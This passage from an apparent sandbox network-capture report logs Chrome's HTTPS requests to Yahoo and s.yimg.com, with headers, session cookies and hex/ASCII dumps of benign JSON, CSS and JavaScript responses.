                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n .wafer-autocomplete-item{display:flex;flex-wrap:no-wrap;justify-content:space-between}#lockerWeather-autocomplete-suggestions .wafer-autocomplete-item{padding-top:6px;padding-bottom:6px}#grid-layout .wafer-autocomplete-item{color:var(--batcave);border:0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              124192.168.2.45114987.248.119.2524431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC740OUTGET /fp_ms/_rcv/remote?ctrl=Shopping&m_id=react-wafer-shopping&m_mode=json&partner=none HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC737INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              status-code: 200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-app-version: 1.0.37300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-applet-version: 1.0.37300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-applet-id: react-wafer-shopping
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-decorator-operation: tdv2-app-fp--mtls-production-ir2.frontpage-k8s-frontend.svc.yahoo.local:4080/*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC5INData Raw: 35 66 37 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5f7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 7b 22 61 73 73 65 74 73 22 3a 7b 22 63 73 73 22 3a 5b 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 63 70 72 6f 70 73 2f 63 6f 6c 6f 72 73 5f 31 2e 31 2e 32 37 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22 3a 22 63 75 73 74 6f 6d 2d 70 72 6f 70 65 72 74 69 65 73 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 31 2e 32 37 22 7d 2c 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 66 70 2f 63 73 73 2f 72 65 61 63 74 2d 77 61 66 65 72 2d 73 68 6f 70 70 69 6e 67 2e 53 68 6f 70 70 69 6e 67 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 64 31 35 36 62 35 34 31 63 30 32 38 66 65 37 64 33 31 36 37 62 31 30 31 64 31 35 35 30 30 66 36 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css","name"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC227INData Raw: 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 5c 22 6f 6e 4c 6f 61 64 5c 22 20 64 61 74 61 2d 77 66 2d 74 61 72 67 65 74 3d 5c 22 23 63 6f 6d 6d 65 72 63 65 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 61 69 6e 65 72 5c 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 5c 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 3f 63 74 72 6c 3d 53 68 6f 70 70 69 6e 67 43 6f 6e 74 65 6e 74 26 61 6d 70 3b 6d 5f 69 64 3d 72 65 61 63 74 2d 77 61 66 65 72 2d 73 68 6f 70 70 69 6e 67 26 61 6d 70 3b 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 61 6d 70 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 3d 25 32 46 66 70 5f 6d 73 25 32 46 5f 72 63 76 25 32 46 72 65 6d 6f 74 65 5c 22 3e 3c 2f 64 69 76 3e 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: data-wf-trigger=\"onLoad\" data-wf-target=\"#commerce-module-container\" data-wf-url=\"/fp_ms/_rcv/remote?ctrl=ShoppingContent&amp;m_id=react-wafer-shopping&amp;m_mode=json&amp;xhrPathPrefix=%2Ffp_ms%2F_rcv%2Fremote\"></div>"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC5INData Raw: 0d 0a 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              125192.168.2.45114687.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC613OUTGET /aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC728INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 6kklazpI4TFM7q1G7rJpUUuFU9z7+F4tn29NXx3+0wiLMlrvdU7bYbLJlEozsIdpRqeqXg3G8TM=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: REAW9M6R8AT0WPBX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 04 Oct 2024 17:00:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 26 Jan 2023 20:02:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "d156b541c028fe7d3167b101d15500f6"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: ID83SH3rHZwgttSuVe3SPvWHmQBqket7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 353613
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC180INData Raw: 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 77 68 69 74 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 23 61 74 6f 6d 69 63 20 2e 4f 76 5c 28 68 5c 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 6f 73 5c 28 72 5c 29 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: #atomic .Bgc\(--white\){background-color:#fff;background-color:var(--white)}#atomic .Ov\(h\){overflow:hidden}#atomic .Pt\(2px\){padding-top:2px}#atomic .Pos\(r\){position:relative}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              126192.168.2.45114487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC547OUTGET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: EwADXk9UKsgNLh4UlLv/r5jNydrgLVX6PNQOTKlduaRGx3x2gsmJdLbHt6ZIL3PdLE/YpSRmPpk=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: CA3BDG177KASV87N
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 11:25:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 24 May 2021 16:40:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "9d2a8efbe3fe9705e54df41100ea2dae"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: s6ZljWUzqa9Ss0D5hEgjXb_jGlec.wYG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 4365
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 460088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tion, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function c(e,t){if(!(e instanceof t))throw new TypeError(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 63 6f 70 79 2d 74 65 78 74 22 5d 2c 68 3d 5b 22 68 61 6e 64 6c 65 43 6f 70 79 22 5d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 61 3d 6f 2e 73 65 6c 65 63 74 6f 72 3b 72 28 74 68 69 73 2c 74 29 3b 76 61 72 20 63 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 61 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 62 7d 29 29 2c 69 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: copy-text"],h=["handleCopy"],w=function(e){function t(e){var o=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},a=o.selector;r(this,t);var c=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:a},{STATE_ATTRS:b})),i=e.getAttribut
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC465INData Raw: 65 61 3b 74 7c 7c 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 73 74 79 6c 65 2c 7b 62 6f 72 64 65 72 3a 22 6e 6f 6e 65 22 2c 62 6f 78 53 68 61 64 6f 77 3a 22 6e 6f 6e 65 22 2c 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 2c 68 65 69 67 68 74 3a 22 32 65 6d 22 2c 6c 65 66 74 3a 30 2c 6f 75 74 6c 69 6e 65 3a 22 6e 6f 6e 65 22 2c 70 61 64 64 69 6e 67 3a 30 2c 70 6f 73 69 74 69 6f 6e 3a 22 66 69 78 65 64 22 2c 74 6f 70 3a 30 2c 77 69 64 74 68 3a 22 32 65 6d 22 7d 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 29 2c 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 2c 74 2e 76 61 6c 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ea;t||(t=document.createElement("textarea"),Object.assign(t.style,{border:"none",boxShadow:"none",display:"none",height:"2em",left:0,outline:"none",padding:0,position:"fixed",top:0,width:"2em"}),document.body.appendChild(t)),t.style.display="block",t.valu


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              127192.168.2.45114887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC538OUTGET /aaq/wf/wf-form-1.34.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: Las7YlqvfMcBNCSElyudhpo2O7WkLG9hk5eXod524twUFGeOAdnqUwN9UVQya5oBS20DXP3g/SU=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 8PXJVQDSC3RZ9GFG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 04 Oct 2024 07:13:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 13 Nov 2023 22:30:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "94d07daa349c254b35ffcda6e54cc754"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: DBytk3Q0UWhxEEWk9lh0GV23FbLhPzJr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 388839
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
